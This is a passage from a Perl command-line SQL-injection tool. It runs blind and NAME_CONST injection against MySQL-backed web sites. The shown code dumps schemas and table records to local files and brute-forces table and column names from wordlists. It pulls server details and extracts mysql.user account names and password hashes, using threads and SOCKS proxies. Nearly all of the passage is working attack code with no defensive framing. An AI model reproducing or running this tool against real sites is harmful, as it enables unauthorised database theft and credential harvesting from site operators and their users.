3027.          $bl_current = "(select" . $bl_plus .  "table_schema" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
3028.             if ($bl_mode==0) {
3029.                    $bl_lenght = len_check();
3030.             } else {
3031.                    $bl_lenght = len_check1();
3032.             }
3033.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
3034.               print "Table_schema for table user [length]:" .  $bl_lenght . "\n";
3035.               ############################################################
3036.               %aa = ();
3037.               $aa = gets1005();
3038.               $data1 = "";
3039.               $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
3040.               #############################################################
3041.               $bl_table_schema = $data1;
3042.               if ($bl_table_schema =~ m/-/imgs) {$bl_table_schema = "`" . $choice . "`"}
3043.               $schema_flag = 0;
3044.               print "\n------------------------------------------------------\n";
3045.               print "Table_schema for table user [value]:" . $bl_table_schema . "\n";
3046.          } else {
3047.               print "\n------------------------------------------------------\n";
3048.               print "Cant't get data...\n";
3049.               print "------------------------------------------------------\n";
3050.          }
3051.          $table_name = $bl_table_schema . "." . $table_name;
3052.     }
3053.     print "-----------------------------------------\n";
3054.     print "Table: $table_name\n";
3055.     print "-----------------------------------------\n";
3056.     ##############################################################################################################
3057.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
3058.     $choice = <STDIN>;
3059.     chomp $choice;
3060.     $column_name = $choice;
3061.     print FILE1  "-----------------------------------------\n";
3062.     print FILE1  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
3063.     print FILE1  "-----------------------------------------\n";
3064.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
3065.     print "-----------------------------------------\n";
3066.     print "Do you want add condition to sql-query?\n";
3067.     print "----------\n";
3068.     print "for example - where id=1 ? (1/0): ";
3069.     $choice11 = <STDIN>;
3070.     chomp $choice11;
3071.     $condition=0;
3072.     if ($choice11==1) {
3073.         print "-----------------------------------------\n";
3074.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
3075.         print "----------\n";
3076.         $choice11 = <STDIN>;
3077.         chomp $choice11;
3078.         $where = $choice11;
3079.         print "Your condition: [ where $where ]\n";
3080.         $condition=1;
3081.     } else {
3082.         $condition=0;
3083.     }
3084.     if ($condition==0) {
3085.          $turbo_flag = 0;
3086.          # ?????? ???-?? ?????? ??????? #
3087.          print "-----------------------------------\n";
3088.          print "Count data from [ $table_name  ]:\n";
3089.          # ?????? ???-?? ?????? ??????? #
3090.          print "-----------------------------------\n";
3091.          ## ???????? ##
3092.          $bl_lenght = "";
3093.          $ii = 0;
3094.          $bl_column_number_DATA = "";
3095.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . ")";
3096.             if ($bl_mode==0) {
3097.                    $bl_lenght = len_check();
3098.             } else {
3099.                    $bl_lenght = len_check1();
3100.             }
3101.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
3102.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
3103.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
3104.                    if ($bl_mode==0) {
3105.                       $bl_column_number_DATA .= get_res_count();
3106.                    } else {
3107.                       $bl_column_number_DATA .= get_res_count1();
3108.                    }
3109.                    print $bl_column_number_DATA . "\r";
3110.                    sleep $pause;
3111.                 }
3112.                 print "\n------------------------------------------------------\n";
3113.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
3114.                 print "--------------------------------------------------------\n";
3115.                 print "Normal MODE - records > 10\n";
3116.                 print "Fast MODE - records <= 10\n";
3117.                 print "TURBO-MODE - 1 record, 1 column\n";
3118.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
3119.                 print "-----------------------------------------\n";
3120.         } else {
3121.                 print "Cant't get data...\n";
3122.         }
3123.         $mflag = 0;
3124.         print "-----------------------------------\n";
3125.         $time = localtime;
3126.         print $time . "\n";
3127.         print "-----------------------------------\n";
3128.          ## start from2 ##
3129.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
3130.          $choice = <STDIN>;
3131.          chomp $choice;
3132.          $thr = $kol_threads; # ???-?? ???????
3133.          if ($choice == 1) {
3134.               $num = -1; # ?? ????????
3135.          } else {
3136.               print "Enter START_position: ";
3137.               $choice1 = <STDIN>;
3138.               chomp $choice1;
3139.               $num = $choice1-1;
3140.               print "Enter END_position: ";
3141.               $choice2 = <STDIN>;
3142.               chomp $choice2;
3143.               $bl_column_number_DATA = $choice2-1;
3144.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
3145.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
3146.               if ($rec_number == 0) {
3147.                  print "\n---------------------------------------------------------------\n";
3148.                  print "Dump just one record, switching to TURBO-MODE....check\n";
3149.                  ($x,$y) = split (/,/,$column_name);
3150.                  if ($y) {
3151.                       "\n---------------------------------------------------------------\n";
3152.                       print "Sorry, just one column for TURBO-MODE\n";
3153.                       "---------------------------------------------------------------\n";
3154.                       $turbo_flag = 0;
3155.                  } else {
3156.                       print "\n---------------------------------------------------------------\n";
3157.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
3158.                       $choice_t = <STDIN>;
3159.                       chomp $choice_t;
3160.                       if ($choice_t == 1) {
3161.                              $turbo_flag = 2;
3162.                              print "=======================================================\n";
3163.                              print "MD5-TURBO-MODE GRANTED\n";
3164.                              print "=======================================================\n";
3165.                       } else {
3166.                              $turbo_flag = 1;
3167.                              print "=======================================================\n";
3168.                              print "TURBO-MODE GRANTED\n";
3169.                              print "=======================================================\n";
3170.                       }
3171.                  }
3172.  
3173.               }
3174.          }
3175.          print "-----------------------------------------\n";
3176.          print "Request method - $method\n";
3177.          print "Threads - $kol_threads\n";
3178.          print "Proxy - $proxy_message\n";
3179.          print "----------------------\n";
3180.          ## end from2
3181.          # ?????? ?????? ?? ??????? #
3182.          $bl_lenght = "";
3183.          $ii = 0;
3184.          $s = 0;
3185.          print "Get columns [$column_name] from [$table_name]:\n";
3186.          print "------------------------\n";
3187.          for(0..$thr) {
3188.             $trl[$_] = threads->create(\&gets104);
3189.          }
3190.          for(0..$thr) {
3191.             $trl[$_]->join;
3192.          }
3193.          $time = localtime;
3194.          print $time . "\n";
3195.          print "----------------------\n";
3196.          sub gets104 {
3197.                 $| = 1;
3198.                 while ($num < $bl_column_number_DATA) {
3199.                 { lock($num);
3200.                 $num++; }
3201.                 $sss = $num;
3202.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "limit" . $bl_plus . $num . ",1)";
3203.                 if ($turbo_flag == 2) {
3204.                     $bl_lenght = 32;
3205.                 } else {
3206.                      if ($bl_mode==0) {
3207.                          $bl_lenght = len_check();
3208.                      } else {
3209.                          $bl_lenght = len_check1();
3210.                      }
3211.                 }
3212.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
3213.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
3214.                       if ($mflag == 1) {
3215.                           ############################################################
3216.                           %aa = ();
3217.                           if ($turbo_flag == 0) {$aa = gets1000();}
3218.                           if ($turbo_flag == 1) {$aa = TURBO();}
3219.                           if ($turbo_flag == 2) {$aa = md5();}
3220.                           $data1 = "";
3221.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
3222.                           #############################################################
3223.                       } else {
3224.                           $data1 = "";
3225.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
3226.                              if ($bl_mode==0) {
3227.                                 $data1 .= chr(get_res_normal());
3228.                              } else {
3229.                                 $data1 .= chr(get_res_normal1());
3230.                              }
3231.                               print $data1 . "\r";
3232.                           }
3233.                       }
3234.                       print "\n-----------------------------------\n";
3235.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
3236.                       print "-----------------------------------\n";
3237.                       print FILE1 "  ---> Record limit $sss,1: " . $data1 . "\n";
3238.                 }
3239.                 sleep $pause;
3240.                 }
3241.          }
3242.          print "----------\n";
3243.          print "Saved in " . "z_" . $host3 . ".txt\n";
3244.          close(FILE1);
3245.          goto START10;
3246.     } else {
3247.     ## ?????? ?????? ?? ??????? ##
3248.          $turbo_flag = 0;
3249.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
3250.          # ?????? ???-?? ?????? ??????? #
3251.          print "-----------------------------------\n";
3252.          ## ???????? ##
3253.          $bl_lenght = "";
3254.          $ii = 0;
3255.          $bl_column_number_DATA = "";
3256.  
3257.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . ")";
3258.             if ($bl_mode==0) {
3259.                    $bl_lenght = len_check();
3260.             } else {
3261.                    $bl_lenght = len_check1();
3262.             }
3263.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
3264.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
3265.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
3266.                    if ($bl_mode==0) {
3267.                       $bl_column_number_DATA .= get_res_count();
3268.                    } else {
3269.                       $bl_column_number_DATA .= get_res_count1();
3270.                    }
3271.                    print $bl_column_number_DATA . "\r";
3272.                    sleep $pause;
3273.                 }
3274.                 print "\n------------------------------------------------------\n";
3275.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
3276.                 print "--------------------------------------------------------\n";
3277.                 print "Normal MODE - records > 10\n";
3278.                 print "Fast MODE - records <= 10\n";
3279.                 print "TURBO-MODE - 1 record, 1 column\n";
3280.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
3281.                 print "-----------------------------------------\n";
3282.         } else {
3283.                 print "\n------------------------------------------------------\n";
3284.                 print "Cant't get data...\n";
3285.                 print "------------------------------------------------------\n";
3286.         }
3287.         print "-----------------------------------\n";
3288.         $mflag = 0;
3289.         $time = localtime;
3290.         print $time . "\n";
3291.         print "-----------------------------------\n";
3292.          ## start from2 ##
3293.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
3294.          $choice = <STDIN>;
3295.          chomp $choice;
3296.          $thr = $kol_threads; # ???-?? ???????
3297.          if ($choice == 1) {
3298.               $num = -1; # ?? ????????
3299.          } else {
3300.               print "Enter START_position: ";
3301.               $choice1 = <STDIN>;
3302.               chomp $choice1;
3303.               $num = $choice1-1;
3304.               print "Enter END_position: ";
3305.               $choice2 = <STDIN>;
3306.               chomp $choice2;
3307.               $bl_column_number_DATA = $choice2-1;
3308.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
3309.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
3310.               if ($rec_number == 0) {
3311.                  print "\n---------------------------------------------------------------\n";
3312.                  print "Dump just one record, switching to TURBO-MODE....check\n";
3313.                  ($x,$y) = split (/,/,$column_name);
3314.                  if ($y) {
3315.                       "\n---------------------------------------------------------------\n";
3316.                       print "Sorry, just one column for TURBO-MODE\n";
3317.                       "---------------------------------------------------------------\n";
3318.                       $turbo_flag = 0;
3319.                  } else {
3320.                       print "\n---------------------------------------------------------------\n";
3321.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
3322.                       $choice_t = <STDIN>;
3323.                       chomp $choice_t;
3324.                       if ($choice_t == 1) {
3325.                              $turbo_flag = 2;
3326.                              print "=======================================================\n";
3327.                              print "MD5-TURBO-MODE GRANTED\n";
3328.                              print "=======================================================\n";
3329.                       } else {
3330.                              $turbo_flag = 1;
3331.                              print "=======================================================\n";
3332.                              print "TURBO-MODE GRANTED\n";
3333.                              print "=======================================================\n";
3334.                       }
3335.                  }
3336.  
3337.               }
3338.          }
3339.          print "-----------------------------------------\n";
3340.          print "Request method - $method\n";
3341.          print "Threads - $kol_threads\n";
3342.          print "Proxy - $proxy_message\n";
3343.          print "----------------------\n";
3344.          ## end from2
3345.          # ?????? ?????? ?? ??????? #
3346.          $bl_lenght = "";
3347.          $ii = 0;
3348.          $s = 0;
3349.          print "Get columns from $table_name:\n";
3350.          print "------------------------\n";
3351.          for(0..$thr) {
3352.             $trl[$_] = threads->create(\&gets105);
3353.          }
3354.          for(0..$thr) {
3355.             $trl[$_]->join;
3356.          }
3357.          $time = localtime;
3358.          print $time . "\n";
3359.          print "----------------------\n";
3360.          sub gets105 {
3361.                 $| = 1;
3362.                 while ($num < $bl_column_number_DATA) {
3363.                 { lock($num);
3364.                 $num++; }
3365.                 $sss = $num;
3366.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . $bl_plus . "limit" . $bl_plus . $num . ",1)";
3367.                 if ($turbo_flag == 2) {
3368.                     $bl_lenght = 32;
3369.                 } else {
3370.                     if ($bl_mode==0) {
3371.                        $bl_lenght = len_check();
3372.                     } else {
3373.                        $bl_lenght = len_check1();
3374.                     }  
3375.                 }
3376.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
3377.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
3378.                       if ($mflag == 1) {
3379.                           ############################################################
3380.                           %aa = ();
3381.                           if ($turbo_flag == 0) {$aa = gets1000();}
3382.                           if ($turbo_flag == 1) {$aa = TURBO();}
3383.                           if ($turbo_flag == 2) {$aa = md5();}
3384.                           $data1 = "";
3385.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
3386.                           #############################################################
3387.                       } else {
3388.                           $data1 = "";
3389.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
3390.                              if ($bl_mode==0) {
3391.                                 $data1 .= chr(get_res_normal());
3392.                              } else {
3393.                                 $data1 .= chr(get_res_normal1());
3394.                              }
3395.                               print $data1 . "\r";
3396.                           }
3397.                       }
3398.                       print "\n-----------------------------------\n";
3399.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
3400.                       print "-----------------------------------\n";
3401.                       print FILE1 "  ---> Record limit $sss,1: " . $data1. "\n";
3402.                 }
3403.                 sleep $pause;
3404.                 }
3405.          }
3406.          print "----------\n";
3407.          print "Saved in " . "z_" . $host3 . ".txt\n";
3408.          close(FILE1);
3409.          goto START10;
3410.     }
3411. }
3412. if ($choice==11) {
3413.    START11:
3414.    print "    [1] Brute table\n";
3415.    print "    [2] Brute column\n";
3416.    print "    [3] Main menu\n";
3417.    print "----------\n";
3418.    $choice = <STDIN>;
3419.    chomp $choice;
3420.    print "Your choice: $choice\n";
3421.    print "-------------\n";
3422.    if ($choice == 1) {
3423.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
3424.        print "   Brute tables\n";
3425.        print "   -------------\n";
3426.        print FILE1 "   Brute tables\n";
3427.        print FILE1 "   -------------\n";
3428.        open(FILE, "<", $source_table_list);
3429.        while(<FILE>) {
3430.          chomp;
3431.          push(@tables4, $_);
3432.        }
3433.        close(FILE);
3434.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
3435.        $choice = <STDIN>;
3436.        chomp $choice;
3437.        if ($choice == 1) {
3438.               print "Enter your prefix for brute tables: ";
3439.               $choice = <STDIN>;
3440.               chomp $choice;
3441.               $pref_brute = $choice;
3442.        } else {
3443.               $pref_brute = "";
3444.        }
3445.        $size = 0;
3446.        $size = @tables4;
3447.        print "File: $source_table_list\n";
3448.        print "Tables: $size\n";
3449.        print "-------------\n";
3450.        print "Request method - $method\n";
3451.        print "Threads - $kol_threads\n";
3452.        print "Proxy - $proxy_message\n";
3453.        print "----------------------\n";
3454.        $thr = $kol_threads; # ???-?? ???????
3455.        $num = -1; # ?? ????????
3456.        for(0..$thr) {
3457.             $trl[$_] = threads->create(\&gets106);
3458.        }
3459.        for(0..$thr) {
3460.             $trl[$_]->join;
3461.        }
3462.        sub gets106 {
3463.             $| = 1;
3464.             while ($num<$size) {
3465.                { lock($num);
3466.                $num++; }
3467.                $chek_len20 = 0;
3468.                $current1 = $pref_brute . $tables4[$num];
3469.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "1" . $bl_plus . "from" . $bl_plus . $current1 . $bl_plus . "limit" . $bl_plus . "0,1)=1" . $bl_filtr;
3470.                $chek_len20 = wr_check();
3471.                if($chek_len20 == 1) {
3472.                     print "   ---> " . $current1 . "\n";
3473.                     print FILE1 "  "  . $current1 . "\n";
3474.                }
3475.                print $num . "\r";
3476.                sleep $pause;
3477.  
3478.             }
3479.        }
3480.        print "----------\n";
3481.        print "Saved in " . "z_" . $host3 . ".txt\n";
3482.        close(FILE1);
3483.        goto START11;
3484.    }
3485.    if ($choice == 2) {
3486.          open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
3487.          print "   Brute columns\n";
3488.          print "   -------------\n";
3489.          print FILE1 "   Brute columns\n";
3490.          print FILE1 "   -------------\n";
3491.          print "Enter the table_name for brute: \n";
3492.          $choice = <STDIN>;
3493.          chomp $choice;
3494.          $table = $choice;
3495.          print "Brute columns for table [ " . $table . " ]\n";
3496.          print "-------------\n";
3497.          open(FILE, "<", $source_column_list);
3498.          while(<FILE>) {
3499.             chomp;
3500.             push(@columns4, $_);
3501.          }
3502.          close(FILE);
3503.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
3504.        $choice = <STDIN>;
3505.        chomp $choice;
3506.        if ($choice == 1) {
3507.               print "Enter your prefix for brute columns: ";
3508.               $choice = <STDIN>;
3509.               chomp $choice;
3510.               $pref_brute = $choice;
3511.        } else {
3512.               $pref_brute = "";
3513.        }
3514.          $size = 0;
3515.          $size = @columns4;
3516.          print "-------------\n";
3517.          print "File: $source_column_list\n";
3518.          print "Columns: $size\n";
3519.          print "-------------\n";
3520.          print "Request method - $method\n";
3521.          print "Threads - $kol_threads\n";
3522.          print "Proxy - $proxy_message\n";
3523.          print "----------------------\n";
3524.          $thr = $kol_threads; # ???-?? ???????
3525.        $num = -1; # ?? ????????
3526.        for(0..$thr) {
3527.             $trl[$_] = threads->create(\&gets107);
3528.        }
3529.        for(0..$thr) {
3530.             $trl[$_]->join;
3531.        }
3532.        sub gets107 {
3533.             $| = 1;
3534.             while ($num<$size) {
3535.                { lock($num);
3536.                $num++; }
3537.                $chek_len20 = 0;
3538.                $current1 = $pref_brute . $columns4[$num];
3539.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "mid(concat(1," . $current1 . "),1,1)" . $bl_plus . "from" . $bl_plus . $table . $bl_plus . "limit" . $bl_plus .  "0,1)=1" . $bl_filtr;
3540.                $chek_len20 = wr_check();
3541.                if($chek_len20 == 1) {
3542.                     print "   ---> " . $current1 . "\n";
3543.                     print FILE1 "  "  . $current1 . "\n";
3544.                }
3545.                print $num . "\r";
3546.                sleep $pause;
3547.  
3548.             }
3549.        }
3550.        print "----------\n";
3551.        print "Saved in " . "z_" . $host3 . ".txt\n";
3552.        close(FILE1);
3553.        goto START11;
3554.    }
3555.    if ($choice == 3) {
3556.        goto START10;
3557.    }
3558. }
3559. if ($choice == 12) {
3560.   goto START;
3561. }
3562. }# end blind
3563. ## mysql name_const ##
3564. if ($choice == 11) {
3565. if ($nc_url =~ m/^https:\/\/?([^\/]+)/i) {
3566.    $host6 = $1;
3567.    $https_flag = 1;
3568.    print "----------------------\n";
3569.    print "HTTPS mode enabled\n";
3570.    print "----------------------\n";
3571. }
3572. $host = $host6;
3573. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
3574.     print "-----------------------------------------\n";
3575.     print "Authorization required, wait please....";
3576.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
3577.     $ck1 = collect($answ1);
3578.     $https_auth_check = 1;
3579.     print " DONE\n";
3580.     print "-----------------------------------------\n";
3581. }
3582. if ($use_socks == 1 && $socks_check == 0) {
3583.   $check_url = $host;
3584.   our $query = "GET / HTTP/1.$http_protocol\r\n"
3585.            . "Host: $check_host\r\n"
3586.            . "Referer: http://" . $check_url . "\r\n"
3587.            . "Accept: */*\r\n"
3588.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
3589.            . "Connection: close\r\n\r\n";
3590.    print "----------------------------------------\n";
3591.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
3592.    print "Timeout = 5 sec:\n";
3593.    print "----------------------------------------\n";
3594.    $socks_check = 0;
3595.    $check_socks = socks_check();
3596.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
3597.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
3598.   if ($current_proxy_host) {
3599.      $socks_check = 1;
3600.      print "Will use --> $proxy_message\n";
3601.   } else {
3602.      $socks_check = 0;
3603.      $proxy_message = "No";
3604.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
3605.   }
3606. }
3607. START200:
3608. print "-----------------------------------------\n";
3609. print "               Choose mode:\n";
3610. print "-----------------------------------------\n";
3611. print "    [1]  NAME_CONST - Mysql inj system information\n";
3612. print "    [2]  NAME_CONST - get DB-names from information_schema.schemata\n";
3613. print "    [3]  NAME_CONST - get tables from DB-name\n";
3614. print "    [4]  NAME_CONST - get column_name from tables from DB-name\n";
3615. print "    [5]  NAME_CONST - Mysql inj get tables from information_schema (current DB)\n";
3616. print "    [6]  NAME_CONST - Mysql inj get column_name from table (current DB)\n";
3617. print "    [7]  NAME_CONST - Mysql inj get data from columns\n";
3618. print "-----------------------------------------\n";
3619. print "    [8]  Main menu\n";
3620. print "-----------------------------------------\n";
3621. $choice = <STDIN>;
3622. chomp $choice;
3623. print "Your choice: $choice\n";
3624. if ($choice==1) {
3625.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
3626.      #### ?????? ?????? #####################################################
3627.      $temp = $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2;
3628.      $nc_start1 = $nc_start . $temp;
3629.      $nc_midle1 = $nc_midle . $temp;
3630.      $url1 = $nc_start1 . $nc_midle1 . $nc_end;
3631.      $nc_start1 = "";
3632.      $nc_midle1 = "";
3633.      #### ?????? ??? ???? #####################################################
3634.      $temp = $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2;
3635.      $nc_start1 = $nc_start . $temp;
3636.      $nc_midle1 = $nc_midle . $temp;
3637.      $url2 = $nc_start1 . $nc_midle1 . $nc_end;
3638.      $nc_start1 = "";
3639.      $nc_midle1 = "";
3640.      #### ?????? ????? #####################################################
3641.      $temp = $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2;
3642.      $nc_start1 = $nc_start . $temp;
3643.      $nc_midle1 = $nc_midle . $temp;
3644.      $url3 = $nc_start1 . $nc_midle1 . $nc_end;
3645.      $nc_start1 = "";
3646.      $nc_midle1 = "";
3647.      #### ?????? @@basedir #####################################################
3648.      $temp = $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2;
3649.      $nc_start1 = $nc_start . $temp;
3650.      $nc_midle1 = $nc_midle . $temp;
3651.      $url4 = $nc_start1 . $nc_midle1 . $nc_end;
3652.      $nc_start1 = "";
3653.      $nc_midle1 = "";
3654.      #### ?????? @@datadir #####################################################
3655.      $temp = $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2;
3656.      $nc_start1 = $nc_start . $temp;
3657.      $nc_midle1 = $nc_midle . $temp;
3658.      $url5 = $nc_start1 . $nc_midle1 . $nc_end;
3659.      $nc_start1 = "";
3660.      $nc_midle1 = "";
3661.      #### ?????? @@tmpdir #####################################################
3662.      $temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
3663.      $nc_start1 = $nc_start . $temp;
3664.      $nc_midle1 = $nc_midle . $temp;
3665.      $url6 = $nc_start1 . $nc_midle1 . $nc_end;
3666.      $nc_start1 = "";
3667.      $nc_midle1 = "";
3668.      #### ?????? @@version_compile_os #####################################################
3669.      $temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
3670.      $nc_start1 = $nc_start . $temp;
3671.      $nc_midle1 = $nc_midle . $temp;
3672.      $url7 = $nc_start1 . $nc_midle1 . $nc_end;
3673.      $nc_start1 = "";
3674.      $nc_midle1 = "";
3675.      #### ?????? mysql.user #####################################################
3676.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
3677.      $nc_start1 = $nc_start . $temp;
3678.      $nc_midle1 = $nc_midle . $temp;
3679.      $url8 = $nc_start1 . $nc_midle1 . $nc_end;
3680.      $nc_start1 = "";
3681.      $nc_midle1 = "";
3682.      #### ?????? mysql.password #####################################################
3683.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user)";
3684.      $nc_start1 = $nc_start . $temp;
3685.      $nc_midle1 = $nc_midle . $temp;
3686.      $url9 = $nc_start1 . $nc_midle1 . $nc_end;
3687.      $nc_start1 = "";
3688.      $nc_midle1 = "";
3689.      #### ?????? file_priv #####################################################
3690.      $temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
3691.      $nc_start1 = $nc_start . $temp;
3692.      $nc_midle1 = $nc_midle . $temp;
3693.      $url10 = $nc_start1 . $nc_midle1 . $nc_end;
3694.      $nc_start1 = "";
3695.      $nc_midle1 = "";
3696.      #####################################################################
3697.      $thr = $kol_threads; # ???-?? ???????
3698.      $num = -1; # ?? ????????
3699.      print "-----------------------------------------\n";
3700.      print "System information:\n";
3701.      print "-----------------------------------------\n";
3702.      print FILE  "-----------------------------------------\n";
3703.      print FILE  "SQL: $url1\n";
3704.      print FILE "-----------------------------------------\n";
3705.      print FILE "System information:\n";
3706.      print FILE "-----------------------------------------\n";
3707.      print "Request method - $method\n";
3708.      print "Threads - $kol_threads\n";
3709.      print "Proxy - $proxy_message\n";
3710.      print "----------------------\n";
3711.      for(0..$thr) {
3712.         $trl[$_] = threads->create(\&gets111);
3713.      }
3714.      for(0..$thr) {
3715.         $trl[$_]->join;
3716.      }
3717.      sub gets111 {
3718.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
3719.         $size = @array; #???????? ?????? ???????
3720.         $| = 1;
3721.         while ($num<$size) {
3722.             { lock($num);
3723.             $num++; }
3724.             $current = $array[$num];
3725.             $content = scan_url();
3726.             if ($content =~ m/ussr(.*?)ussr/img) {
3727.                   print $1 . "\n";
3728.                   print FILE $1 . "\n";
3729.             }
3730.             print $num . "\r";
3731.             sleep $pause;
3732.         }
3733.      }
3734.      print "----------\n";
3735.      print "Saved in " . "z_" . $host . ".txt\n";
3736.      close(FILE);
3737.      goto START200;
3738. }#end 1
3739. # DB from schemata
3740. if ($choice == 2) {
3741.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
3742.      ## ???-?? ?? ? information_schema.schemata ##
3743.      $temp = "(select" . $nc_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . "0,1)";
3744.      $nc_start1 = $nc_start . $temp;
3745.      $nc_midle1 = $nc_midle . $temp;
3746.      $current = $nc_start1 . $nc_midle1 . $nc_end;
3747.      $content = scan_url();
3748.      $bd_num = $content;
3749.      $bd_num =~ m/ussr(.*?)ussr/img;
3750.      $bd_num = $1-1;
3751.      print FILE "-----------------------------------------\n";
3752.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
3753.      print FILE "-----------------------------------------\n";
3754.      print "-----------------------------------------\n";
3755.      print "Data bases in information_schema.schemata - $1\n";
3756.      print "-----------------------------------------\n";
3757.      $num = -1; # ?? ????????
3758.      $thr = $kol_threads; # ???-?? ???????
3759.      print "Request method - $method\n";
3760.      print "Threads - $kol_threads\n";
3761.      print "Proxy - $proxy_message\n";
3762.      print "----------------------\n";
3763.      for(0..$thr) {
3764.          $trl[$_] = threads->create(\&gets5050111);
3765.      }
3766.      for(0..$thr) {
3767.          $trl[$_]->join;
3768.      }
3769.      sub gets5050111 {
3770.        $| = 1;
3771.        while ($num<$bd_num) {
3772.          { lock($num);
3773.          $num++; }
3774.          $temp = "(select" . $nc_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "information_schema.schemata" . $nc_plus . "limit" . $nc_plus . $num . ",1)";
3775.          $nc_start1 = $nc_start . $temp;
3776.          $nc_midle1 = $nc_midle . $temp;
3777.          $current = $nc_start1 . $nc_midle1 . $nc_end;
3778.          $content = scan_url();
3779.          if ($content =~ m/ussr(.*?)ussr/img) {
3780.                   print $1 . "\n";
3781.                   print FILE $1 . "\n";
3782.          }
3783.          print $num . "\r";
3784.          sleep $pause;
3785.  
3786.        }
3787.      }
3788.     print "----------\n";
3789.     print "Saved in " . "z_" . $host . ".txt\n";
3790.     close(FILE);
3791.     goto START200;
3792. } # end DB
3793. # tables from DB from schemata
3794. if ($choice == 3) {
3795.      sub ascii_to_hex ($) {
